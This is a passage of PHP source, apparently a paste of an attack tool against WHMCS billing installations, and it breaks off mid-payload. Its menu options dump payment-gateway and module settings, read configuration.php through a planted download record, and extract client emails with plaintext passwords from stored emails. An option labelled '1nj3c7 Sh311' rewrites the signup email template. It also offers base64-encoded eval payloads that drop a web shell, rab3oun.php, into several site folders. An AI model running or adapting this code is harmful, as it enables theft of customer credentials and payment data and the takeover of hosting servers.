href=\"?p=112\" target=\"frame1\"> Custom Fields</a></td></tr><tr><td>\n<a href=\"?p=9\" target=\"_parent\"> Logout</a></td></tr></table>");
  554. break;
  555. ###################################################
  556. case"h":
  557. login();
  558. exit;
  559. break;
  560. ###################################################
  561. case 110:
  562. $r=randomt();
  563. $query0=mysql_query("SELECT value FROM tblconfiguration where setting='SystemURL'");
  564. $v0=mysql_fetch_array($query0);
  565. $SystemURL=$v0['value'];
  566. echo "<table><form method=\"POST\" action=\"?p=110\" >
  567. <tr><td>Website Url</td><td>
  568. <input type=\"text\" size=60 name=\"url\" value=\"".$SystemURL."\"></td></tr>
  569. <tr><td>File</td><td><input type=\"text\" size=60 name=\"file\" value=\"../configuration.php\"></td></tr>
  570. </table>
  571. <input type=\"Submit\" name=\"Submit\" value=\"Submit\">
  572. <input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  573. if($_POST["action"]=="1")
  574. {
  575. $result=mysql_query("INSERT INTO `tbldownloadcats` (`id`, `parentid`, `name`, `description`, `hidden`) VALUES
  576. (', 0, '$r', ', ');")or die("Erreur SQL !<br>".mysql_error());
  577. $id = mysql_insert_id();
  578. // echo $id;
  579. $result=mysql_query("INSERT INTO `tbldownloads` (`id`, `category`, `type`, `title`, `description`, `downloads`, `location`, `clientsonly`, `productdownload`) VALUES
  580. (', '$id', 'zip', '$r', '$r', 0, '".$_POST["file"]."', ', ');")or die("Erreur SQL !<br>".mysql_error());
  581. $id = mysql_insert_id();
  582. // echo $id;
  583. $ch = curl_init();
  584. curl_setopt($ch,CURLOPT_URL,$_POST["url"]."/dl.php?type=d&id=$id");
  585.  
  586. curl_setopt($ch, CURLOPT_HEADER, 0);
  587. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  588. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  589.  
  590. $result = curl_exec($ch);
  591. echo "<xmp>$result</xmp>" ;
  592. $result=mysql_query("delete from `tbldownloadcats` where `name`='$r'");
  593. $result=mysql_query("delete from `tbldownloads` where `title`='$r'");
  594. }
  595. break;
  596. ###################################################
  597. case 112:
  598.  
  599. if (($_POST['action']=='1') and is_array($_POST['id']))
  600. {
  601.  
  602. echo("<center><h1>Custom Fields Values</h1><br><table border'1'>");
  603.  
  604. $x= implode(",",$_POST['id']);
  605.  
  606. $result=mysql_query("SELECT * FROM `tblcustomfieldsvalues` where fieldid in ($x) order by relid") ;
  607. $fieldnum=@mysql_num_fields($result);
  608. echo("<tr>");
  609. for($i=0;$i<$fieldnum;$i++)
  610. {
  611. $name=@mysql_field_name($result,$i);
  612. echo("<th>$name</th>");
  613. }
  614. echo("</tr>");
  615. $last="";
  616. $k=0;
  617. while($v=@mysql_fetch_array($result,1))
  618. {
  619. if ($k%2==0) {$bg='class="bg"';} else {$bg=';}
  620. if ($v['relid']<>$last) echo "<TR><TD COLSPAN=14>&nbsp;</td></TR>";
  621. $last=$v['relid'];
  622. $td="<tr $bg><td>";
  623. $td=$td.implode("</td><td>",$v);
  624. $td=$td."</tr>\n";
  625. echo($td);
  626. $k++;
  627. }
  628.  
  629. echo("</table></center>");
  630. exit;
  631. }
  632. echo("<center><h1>Custom Fields</h1><br></center><form action=\"?p=112\" name=\"formw\" method=\"post\"><table width='75%' border='1'>");
  633. $result=mysql_query("SELECT * FROM `tblcustomfields` order by relid ");
  634. $fieldnum=@mysql_num_fields($result);
  635. echo("\n<tr><th></th>");
  636. for($i=0;$i<$fieldnum;$i++)
  637. {
  638. $name=@mysql_field_name($result,$i);
  639. echo("<th>$name</th>");
  640. }
  641. echo("</tr>");
  642. $last="";
  643. $k=1;
  644. while($v=@mysql_fetch_array($result,1))
  645. {
  646. if ($v['relid']<>$last) {echo "<TR><TD COLSPAN=14>&nbsp;</td></TR>";$k++;}
  647. if ($k%2==0) {$bg='class="bg"';} else {$bg=';}
  648. $last=$v['relid'];
  649. $id=$v['id'];
  650. $td="\n<tr $bg><td>
  651. <input type=\"checkbox\" name=\"id[]\" value=\"$id\" />
  652. </td><td>";
  653. $td=$td.implode("</td><td >",$v);
  654. $td=$td."</td></tr>\n";
  655. echo($td);
  656. }
  657.  
  658. echo("</table><br><input type='hidden' name='action' value='1'/><input type='submit'/></form>");
  659.  
  660. break;
  661. ###################################################
  662. case 111:
  663. echo("<center><h1>Addon Modules</h1>");
  664. table("SELECT * FROM `tbladdonmodules` order by module",array('module','setting','value'));
  665. echo("</center>");
  666. break;
  667. ###################################################
  668. case 109:
  669. echo("<center><h1>Payment Gateways</h1><br>");
  670. table("SELECT * FROM `tblpaymentgateways`",array("gateway","setting","value","order"));
  671. echo("</center>");
  672. break;
  673. ###################################################
  674. case 105:
  675. echo "<center><h1>Clients Password</h1>";
  676. $query0=mysql_query("SELECT * FROM tblemailtemplates where name='Client Signup Email' or name='Password Reset Confirmation'");
  677. while($v0=mysql_fetch_array($query0))
  678. {
  679. $t=$v0['subject'];
  680. $t=trim(str_replace('{$company_name}',',$t));
  681. $c=$v0['message'];
  682. $c=explode("\n",$c);
  683. $r="";
  684. for ($i=0;$i<count($c);$i++) {
  685. if(strpos($c[$i],'{$client_password}')>0) {
  686. $r.= $c[$i];
  687. }elseif(strpos($c[$i],'{$client_email}')>0) {
  688. $r.= $c[$i];
  689. }
  690. }
  691. $r=preg_quote($r);
  692. $r=str_replace('\{\$client_email\}','(.*)',$r);
  693. $r=str_replace('\{\$client_password\}','(.*)',$r);
  694. $r=str_replace('\{\$whmcs_link\}','(.*)',$r);
  695. $r=str_replace('\{\$signature\}','(.*)',$r);
  696. $r=str_replace('\{\$client_name\}','(.*)',$r);
  697. $r=str_replace("\n","",$r);
  698. $r=str_replace("\r","",$r);
  699. $query=mysql_query("SELECT message,userid FROM tblemails where subject like '%".$t."%'");
  700. while($v=mysql_fetch_array($query))
  701. {
  702. $mail=$v['message'];
  703. $mail=str_replace("\n","",$mail);
  704. $mail=str_replace("\r","",$mail);
  705. // echo $mail;
  706. $reg = "|(.*)$r(.*)|isU";
  707. // echo $reg;
  708. $a=array();
  709. preg_match_all($reg,($mail),$a);
  710. for ($i=1;$i<count($a);$i++){
  711. if( eregi("^[_\.0-9a-z-]+@([0-9a-z-]+\.)+[a-z]{2,10}$",$a[$i][0]) ) {
  712. $list[$v['userid']]['mail'][]=$a[$i][0];
  713. $list[$v['userid']]['pass'][]=$a[$i+1][0];
  714. }
  715. }
  716. }
  717.  
  718. }
  719. echo("<h3 class=\"tit\">Total Records ".(count($list)-1)."</h3>");
  720. echo "<table border='1'>";
  721. foreach ($list as $x=>$y){
  722. echo "<tr><td><a href='?p=12&id=$x'>$x</a></td><td>".implode("<br>",$y['mail'])."</td><td>".implode("<br>",$y['pass'])."</td></tr>";
  723. }
  724. echo "</table>";
  725. break;
  726. ######################################################################################################
  727. case 108:
  728. echo "<center><h1>1nj3c7 Sh311</h1>";
  729.  
  730.  
  731.  
  732. if($_POST["action"]=="1")
  733. {
  734. $tryChaning=mysql_query("Update tblemailtemplates set message='".mysql_real_escape_string(stripslashes($_POST["c"]))."' where name='Client Signup Email'" )or die("Erreur SQL !<br>".mysql_error());
  735. if($tryChaning)
  736. {
  737.  
  738. echo '<p class="msg done">Updated successfully </p>';
  739. }
  740. else
  741. {
  742.  
  743. echo("<h3 class=\"tit\"><br>Error</h3>");
  744. }
  745. }
  746. $query0=mysql_query("SELECT message from tblemailtemplates where name='Client Signup Email'");
  747. $v0=mysql_fetch_array($query0);
  748. echo "<br><form method=\"POST\" action=\"?p=108\" ><textarea name=\"c\" cols='50' rows='10' >".$v0["message"]."</textarea><br><br><input type=\"Submit\" name=\"Submit\" value=\"Submit\"><input type=\"hidden\" name=\"action\" value=\"1\"></form>";
  749. echo "</center><p class='msg warning'>Add one of this code<u> in the end of code</u> And register you will get your file</p><br><center>";
  750. echo "<fieldset><legend>rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgncmFiM291bi5waHAnLCd3Jyk7DQoNCiR3cml0ICA9IGZ3cml0ZSgkZjBwM24gLCAkYzBkZSk7'));{/php}</textarea></fieldset>";
  751. echo "<fieldset><legend>downloads/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV0VnYm1GdFpUMGlZMjl1ZEdWdWRITWlJR052YkhNOUlqY3dJaUJ5YjNkelBTSXlOU0krRFFvOFAwVmphRzhnSkdacGJHVmpiMjUwWlc1MGN6cy9Qand2ZEdWNGRHRnlaV0UrUEM5bWIyNTBQanhpY2o0TkNqeHBibkIxZENCMGVYQmxQU0p6ZFdKdGFYUWlJRzVoYldVOUluTjFZbTFwZENJZ2RtRnNkV1U5SWxOaGRtVWlQZzBLUEdsdWNIVjBJSFI1Y0dVOUluSmxjMlYwSWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZz09Jyk7DQoNCiRmMHAzbiA9IGZvcGVuICgnZG93bmxvYWRzL3JhYjNvdW4ucGhwJywndycpOw0KDQokd3JpdCAgPSBmd3JpdGUoJGYwcDNuICwgJGMwZGUpOw=='));{/php}</textarea></fieldset>";
  752. echo "<fieldset><legend>attachments/rab3oun.php</legend><textarea cols='50' rows='10' >{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajQ4UHcwS1pYSnliM0pmY21Wd2IzSjBhVzVuS0RBcE93MEtKSE5qY21sd2RHNWhiV1VnUFNBa1gxTkZVbFpGVWxzblUwTlNTVkJVWDA1QlRVVW5YVHNOQ2lSbWFXeGxibUZ0WlNBOUlDUmZVRTlUVkZzaVptbHNaVzVoYldVaVhUc05DbWxtS0NSZlVFOVRWRnNpYzNWaWJXbDBJbDBnUFQwZ0lrOXdaVzRpS1EwS2V3MEthV1lvWm1sc1pWOWxlR2x6ZEhNb0pHWnBiR1Z1WVcxbEtTa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0JvZEcxc1pXNTBhWFJwWlhNb1ptbHNaVjluWlhSZlkyOXVkR1Z1ZEhNb0pHWnBiR1Z1WVcxbEtTazdEUXBwWmlnaEpHWnBiR1ZqYjI1MFpXNTBjeWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1RmNuSnZjaUJ2Y2lCT2J5QmpiMjUwWlc1MGN5QnBiaUJtYVd4bFBDOW1iMjUwUGlJN0RRcDlEUXBsYkhObERRb2tjM1JoZEhWeklEMGdJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytSbWxzWlNCa2IyVnpJRzV2ZENCbGVHbHpkQ0U4TDJadmJuUStJanNOQ24wSkNRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pFWld4bGRHVWlLUTBLZXcwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuc05DbWxtS0hWdWJHbHVheWdrWm1sc1pXNWhiV1VwS1FrTkNpUnpkR0YwZFhNZ1BTQWlQR1p2Ym5RZ1ptRmpaVDBuVm1WeVpHRnVZU2NnYzNSNWJHVTlKMlp2Ym5RdGMybDZaVG9nT0hCMEp6NUdhV3hsSUhOMVkyTmxjM05tZFd4c2VTQmtaV3hsZEdWa0lUd3ZabTl1ZEQ0aU93MEtaV3h6WlEwS0pITjBZWFIxY3lBOUlDSThabTl1ZENCbVlXTmxQU2RXWlhKa1lXNWhKeUJ6ZEhsc1pUMG5abTl1ZEMxemFYcGxPaUE0Y0hRblBrTnZkV3hrSUc1dmRDQmtaV3hsZEdVZ1ptbHNaU0U4TDJadmJuUStJanNOQ24wTkNtVnNjMlVOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJR1J2WlhNZ2JtOTBJR1Y0YVhOMElUd3ZabTl1ZEQ0aU93MEtmUTBLWld4elpTQnBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKVFlYWmxJaWtOQ25zTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCemRISnBjSE5zWVhOb1pYTW9hSFJ0YkY5bGJuUnBkSGxmWkdWamIyUmxLQ1JmVUU5VFZGc2lZMjl1ZEdWdWRITWlYU2twT3cwS2FXWW9abWxzWlY5bGVHbHpkSE1vSkdacGJHVnVZVzFsS1NrTkNuVnViR2x1YXlna1ptbHNaVzVoYldVcE93MEtKR2hoYm1Sc1pTQTlJR1p2Y0dWdUtDUm1hV3hsYm1GdFpTd2dJbmNpS1RzTkNtbG1LQ0VrYUdGdVpHeGxLUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCdmNHVnVJR1pwYkdVZ1ptOXlJSGR5YVhSbElHRmpZMlZ6Y3lFZ1BDOW1iMjUwUGlJN0RRcGxiSE5sRFFwN0RRcHBaaWdoWm5keWFYUmxLQ1JvWVc1a2JHVXNJQ1JtYVd4bFkyOXVkR1Z1ZEhNcEtRMEtKSE4wWVhSMWN5QTlJQ1J6ZEdGMGRYTXVJanhtYjI1MElHWmhZMlU5SjFabGNtUmhibUVuSUhOMGVXeGxQU2RtYjI1MExYTnBlbVU2SURod2RDYytRMjkxYkdRZ2JtOTBJSGR5YVhSbElIUnZJR1pwYkdVaElDaE5ZWGxpWlNCNWIzVWdaR2xrYmlkMElHVnVkR1Z5SUdGdWVTQjBaWGgwUHlrOEwyWnZiblErSWpzTkNtWmpiRzl6WlNna2FHRnVaR3hsS1RzTkNuME5DaVJtYVd4bFkyOXVkR1Z1ZEhNZ1BTQm9kRzFzWlc1MGFYUnBaWE1vSkdacGJHVmpiMjUwWlc1MGN5azdEUXA5RFFwbGJITmxEUXA3RFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1RtOGdabWxzWlNCc2IyRmtaV1FoUEM5bWIyNTBQaUk3RFFwOURRby9QZzBLUEhSaFlteGxJR0p2Y21SbGNqMGlNQ0lnWVd4cFoyNDlJbU5sYm5SbGNpSStQSFJ5UGp4MFpENDhkR0ZpYkdVZ2QybGtkR2c5SWpFd01DVWlJR0p2Y21SbGNqMGlNQ0krUEhSeVBqeDBaRDROQ2p4bWIzSnRJRzFsZEdodlpEMGljRzl6ZENJZ1lXTjBhVzl1UFNJOFAwVmphRzhnSkhOamNtbHdkRzVoYldVN1B6NGlQZzBLUEdsdWNIVjBJRzVoYldVOUltWnBiR1Z1WVcxbElpQjBlWEJsUFNKMFpYaDBJaUIyWVd4MVpUMGlQRDlGWTJodklDUm1hV3hsYm1GdFpUcy9QaUlnYzJsNlpUMGlOeklpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdibUZ0WlQwaWMzVmliV2wwSWlCMllXeDFaVDBpVDNCbGJpSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCdVlXMWxQU0p6ZFdKdGFYUWlJSFpoYkhWbFBTSkVaV3hsZEdVaVBqd3ZkR1ErUEM5MGNqNDhMM1JoWW14bFBnMEtQR1p2Ym5RZ1ptRmpaVDBpVm1WeVpHRnVZU0lnYzNSNWJHVTlJbVp2Ym5RdGMybDZaVG9nTVRGd2RDSStEUW84ZEdWNGRHRnlaV